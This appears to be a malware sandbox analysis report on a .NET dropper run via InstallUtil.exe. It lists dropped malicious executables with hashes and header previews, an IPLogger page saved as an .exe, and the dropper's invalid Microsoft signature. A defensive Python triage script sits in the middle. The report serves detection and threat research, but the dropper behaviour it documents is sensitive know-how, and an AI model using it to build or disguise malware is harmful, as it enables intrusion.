SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684774510672066
Encrypted:false
SSDEEP:49152:nnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHV:SWqlkLESgCRE/vhOjb05efd6e/oXHV
MD5:F373B534C3183D8B0486968AB562D38A
SHA1:CFEE54793DC2AD3D75ED508E365F72BD99DBE7D7
SHA-256:34E5E9ADB4D4BFCA12810D692E01C6FC4C4E7C90C07FF61346C867863133B012
SHA-512:6309CC3E583BD7797B50E15867AD0AC9F158189E92EBD69D6207C55F57D5039DFC38C305F8205470FA788865778B4AB3B98AAA5468F69021320BF1C32BDBEBBC
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
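The dropped-file records above list, for each file InstallUtil.exe wrote to disk, an 8-bit entropy value, an Encrypted flag, and four digests, and they show the three shapes that turn up in this sample: a Delphi-stub PE at entropy 7.99 flagged Encrypted, an NSIS self-extracting installer at 7.98 not flagged, and an IPLogger landing page saved where a payload was expected (the "HTML files with .exe extension" behaviour in the signature list). The following Python is an added example, not Joe Sandbox code, that recomputes those fields and triages a blob by content rather than by extension. The 7.99 entropy cut-off is an assumption chosen only to be consistent with the two values shown, not the sandbox's documented rule; the NSIS first-header magic and the Delphi DOS-stub text are well-known markers; every sample blob is constructed here and stands in for, but is not, the real dropped file.

```python
"""Recompute the per-file fields in the dropped-file records and triage each
blob by content. Added example for this report, not Joe Sandbox code.
ENCRYPTED_THRESHOLD is an assumption; SAMPLES are constructed, not real drops.
"""
import hashlib
import math
from collections import Counter

ENCRYPTED_THRESHOLD = 7.99  # assumption: consistent with 7.98 -> false, 7.99 -> true above

NSIS_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"           # NSIS first-header signature
DELPHI_STUB = b"This program must be run under Win32"  # Borland/Delphi DOS-stub text


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for empty input, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """The same four digests the report lists, upper-case hex like the report."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def classify(data: bytes) -> str:
    """Content-based type: MZ header plus NSIS/Delphi markers, or an HTML body."""
    head = data[:4096]
    if head.startswith(b"MZ"):
        if NSIS_MAGIC in data:
            return "PE32 (Nullsoft Installer self-extracting archive)"
        if head.startswith(b"MZP") and DELPHI_STUB in head:
            return "PE32 (Delphi stub)"
        return "PE32"
    lowered = head.lstrip().lower()
    if lowered.startswith(b"<!doctype html") or lowered.startswith(b"<html"):
        return "HTML document"
    return "unknown"


def triage(name: str, data: bytes) -> dict:
    """One record per dropped file, mirroring the report's fields plus a mismatch flag."""
    ent = shannon_entropy(data)
    rec = {"name": name, "size": len(data), "entropy": round(ent, 6),
           "encrypted": ent > ENCRYPTED_THRESHOLD, "type": classify(data)}
    rec.update(hashes(data))
    # An HTML body saved under an .exe name is the 'expired dropper' pattern:
    # the download URL now serves a landing/redirect page instead of a payload.
    rec["extension_mismatch"] = name.lower().endswith(".exe") and rec["type"] == "HTML document"
    return rec


def pseudo_random(n_blocks: int, seed: bytes) -> bytes:
    """Deterministic high-entropy filler (chained SHA-256) standing in for packed data."""
    return b"".join(hashlib.sha256(seed + i.to_bytes(4, "little")).digest()
                    for i in range(n_blocks))


# Constructed stand-ins for the three kinds of dropped file seen in the records.
SAMPLES = {
    "packed.exe": b"MZP" + b"\x00" * 61 + DELPHI_STUB + b"\r\n$" + pseudo_random(8192, b"delphi"),
    "setup.exe": b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode.\r\n$"
                 + NSIS_MAGIC + pseudo_random(256, b"nsis"),
    "file.exe": b'<!DOCTYPE html>\n<html lang="" class="html">\n<head>\n<title></title>\n'
                b'<meta name="copyright" content="Copyright IPLogger 2010-" />\n</head></html>\n',
}


def run_samples() -> list:
    """Triage every constructed sample; returns the records in SAMPLES order."""
    return [triage(name, blob) for name, blob in SAMPLES.items()]


if __name__ == "__main__":
    for r in run_samples():
        print(f"{r['name']:12} {r['type']:48} size={r['size']:7d} "
              f"entropy={r['entropy']:.4f} encrypted={r['encrypted']} "
              f"mismatch={r['extension_mismatch']} sha256={r['SHA-256'][:16]}...")
```

Run it over a real sandbox drop directory by replacing SAMPLES with `{p.name: p.read_bytes() for p in Path(d).iterdir()}`; a record whose type is HTML but whose name ends in .exe is the first thing to pull, since it tells you the distribution URL had already been rotated or taken down when the sample ran, and the SHA-256 column lets you de-duplicate the same payload written to several paths before submitting hashes to threat-intel lookups.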
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                Entropy (8bit):4.465630519219252
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:vIXfpi67eLPU9skLmb0b4hWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSba:AXD94hWlLZMM6YFH1+a
                                                                                                                                                                                                                                MD5:F1C91B6D8D06D87D7A0A1594ED2E1BFF
                                                                                                                                                                                                                                SHA1:8BCE498E1D672008F00329C36B013A08AD39190F
                                                                                                                                                                                                                                SHA-256:4B3A959C58B2636BE6A46A99335A57038119C67F9ECA2BF431C8DF7EE696F40E
                                                                                                                                                                                                                                SHA-512:B5ADBD090ADBD265550F256929E13D1450AC1CBD78C1E051D26725F54F5754377DD2D1B21112DDB9CFC9AAC349A33FEC47C033F32ECE3475E511C65A658CF6DF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:regf6...5....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..%.gt................................................................................................................................................................................................................................................................................................................................................3.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1765376
                                                                                                                                                                                                                                Entropy (8bit):4.580689864272319
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:jIXfpi67eLPU9skLmb0b4hWSPDaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSba:0XD94hWSLZMM6YFH1+a
                                                                                                                                                                                                                                MD5:A92ACCE6960BC267D2E9B935641EB886
                                                                                                                                                                                                                                SHA1:291D08133D2BB53D2D15000EAEB91A377DB68473
                                                                                                                                                                                                                                SHA-256:4DC29D850B94D9664570648E7791E6AAAAAF46DD650CD2BBF6EC2B246B2094CC
                                                                                                                                                                                                                                SHA-512:D46B5B5E61DB00F2C8FFCB71255BF2D992CEE9987B1263F8D0F36FCA41297034BCA47FFBA4C10C22EABF63C4C344AA45DFC1D03104CE583A99E1F56464B7F50F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:regf5...5....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..%.gt................................................................................................................................................................................................................................................................................................................................................3.HvLE........5............nV.r......:>.......0...@......hbin.................\.Z............nk,..\.Z........ ...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........b...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............
                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):6.189955402565391
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                                                                                                                                                                                File name:file.exe
                                                                                                                                                                                                                                File size:46'304 bytes
                                                                                                                                                                                                                                MD5:e533f92146fcacb8caca823882b8d304
                                                                                                                                                                                                                                SHA1:fcb2b79d08e2fb7a58142faf7db2a36f142b309d
                                                                                                                                                                                                                                SHA256:3cf0b82b4b91ac001ede7dfe7736f42e2a5e1bd9cc6da34393ec9e18ec81a9fe
                                                                                                                                                                                                                                SHA512:334b90d543b5835f88d3891c03fe78ac91c2569e47bfb11fbae58b9544fa569f411e4a2d8b57049a97f79afd51312eed57dd95c74b680331882ca77a46888c69
                                                                                                                                                                                                                                SSDEEP:768:ygDUz4vSd32TINlRjiniKEc3dJ3Bwj+3p5SNUMNTEFiRQ:zUz4Kd320N+nir2FMN9NeiS
                                                                                                                                                                                                                                TLSH:A2238E12737C573BCFEF4BB99860621016749362AB41CBAD2DD4A0DE54ABBC507223E7
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...I.B..........."...0.....&............ ....@...... ..............................t.....`................................
                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                Entrypoint:0x400000
                                                                                                                                                                                                                                Entrypoint Section:
                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:
                                                                                                                                                                                                                                Signature Valid:false
                                                                                                                                                                                                                                Signature Issuer:C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                                                                                Error Number:-2146762487
                                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                                • 12/03/2024 08:45:35 12/03/2025 08:45:35
                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                • C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
                                                                                                                                                                                                                                Version:3
